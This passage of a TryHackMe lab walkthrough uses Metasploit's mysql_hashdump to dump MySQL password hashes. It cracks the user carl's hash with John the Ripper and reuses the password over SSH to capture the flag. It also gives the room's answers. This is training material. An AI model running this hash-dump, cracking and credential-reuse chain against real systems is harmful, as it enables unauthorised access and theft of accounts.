Again, I’ll let you take it from here. Set the relevant options, run the exploit. What non-default user stands out to you?

carl

 1msf6 auxiliary(scanner/mysql/mysql_hashdump) > options
 2
 3Module options (auxiliary/scanner/mysql/mysql_hashdump):
 4
 5Name Current Setting Required Description
 6
 7---
 8
 9PASSWORD no The password for the specified username
10RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasplo
11it.html
12RPORT 3306 yes The target port (TCP)
13THREADS 1 yes The number of concurrent threads (max one per host)
14USERNAME no The username to authenticate as
15
16View the full module info with the info, or info -d command.
17
18msf6 auxiliary(scanner/mysql/mysql_hashdump) > set USERNAME root
19USERNAME => root
20msf6 auxiliary(scanner/mysql/mysql_hashdump) > set RHOSTS 10.10.151.196
21RHOSTS => 10.10.151.196
22msf6 auxiliary(scanner/mysql/mysql_hashdump) > set PASSWORD password
23PASSWORD => password

 1msf6 auxiliary(scanner/mysql/mysql_hashdump) > run
 2
 3[+] 10.10.151.196:3306 - Saving HashString as Loot: root:
 4[+] 10.10.151.196:3306 - Saving HashString as Loot: mysql.session:*THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE
 5[+] 10.10.151.196:3306 - Saving HashString as Loot: mysql.sys:*THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE
 6[+] 10.10.151.196:3306 - Saving HashString as Loot: debian-sys-maint:*D9C95B328FE46FFAE1A55A2DE5719A8681B2F79E
 7[+] 10.10.151.196:3306 - Saving HashString as Loot: root:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
 8[+] 10.10.151.196:3306 - Saving HashString as Loot: carl:_EA031893AA21444B170FC2162A56978B8CEECE18
 9[_] 10.10.151.196:3306 - Scanned 1 of 1 hosts (100% complete)
10[*] Auxiliary module execution completed

Another user! And we have their password hash. This could be very interesting. Copy the hash string in full, like: bob:*HASH to a text file on your local machine called “hash.txt”. What is the user/hash combination string?

carl:*EA031893AA21444B170FC2162A56978B8CEECE18

Now, we need to crack the password! Let’s try John the Ripper against it using: john hash.txt. What is the password of the user we found?

doggie

 1root@ip-10-10-35-22:~# cat > hash.txt
 2carl:*EA031893AA21444B170FC2162A56978B8CEECE18
 3root@ip-10-10-35-22:~# cat hash.txt
 4carl:*EA031893AA21444B170FC2162A56978B8CEECE18
 5root@ip-10-10-35-22:~# john hash.txt
 6Warning: detected hash type "mysql-sha1", but the string is also recognized as "mysql-sha1-opencl"
 7Use the "--format=mysql-sha1-opencl" option to force loading these as that type instead
 8Using default input encoding: UTF-8
 9Loaded 1 password hash (mysql-sha1, MySQL 4.1+ [SHA1 256/256 AVX2 8x])
10Warning: no OpenMP support for this hash type, consider --fork=2
11Proceeding with single, rules:Single
12Press 'q' or Ctrl-C to abort, almost any other key for status
13Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.
14Almost done: Processing the remaining buffered candidate passwords, if any.
15Proceeding with wordlist:/opt/john/password.lst
16Proceeding with incremental:ASCII
17doggie (carl)
181g 0:00:00:01 DONE 3/3 (2024-06-26 06:01) 0.5291g/s 1209Kp/s 1209Kc/s 1209KC/s doggie..doggia
19Use the "--show" option to display all of the cracked passwords reliably
20Session completed.

Awesome. Password reuse is not only extremely dangerous, but extremely common. What are the chances that this user has reused their password for a different service? What’s the contents of MySQL.txt?

THM{congratulations_you_got_the_mySQL_flag}

 1root@ip-10-10-35-22:~# ssh carl@10.10.151.196
 2carl@10.10.151.196's password:
 3Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-96-generic x86_64)
 4
 5- Documentation: https://help.ubuntu.com
 6- Management: https://landscape.canonical.com
 7- Support: https://ubuntu.com/advantage
 8
 9System information as of Wed Jun 26 05:04:05 UTC 2024
10
11System load: 0.0 Processes: 87
12Usage of /: 41.7% of 9.78GB Users logged in: 0
13Memory usage: 32% IP address for eth0: 10.10.151.196
14Swap usage: 0%
15
1623 packages can be updated.
170 updates are security updates.
18
19Last login: Thu Apr 23 12:57:41 2020 from 192.168.1.110
20carl@polomysql:~$ ls
21MySQL.txt
22carl@polomysql:~$ cat MySQL.txt
23THM{congratulations_you_got_the_mySQL_flag}

#TryHackMe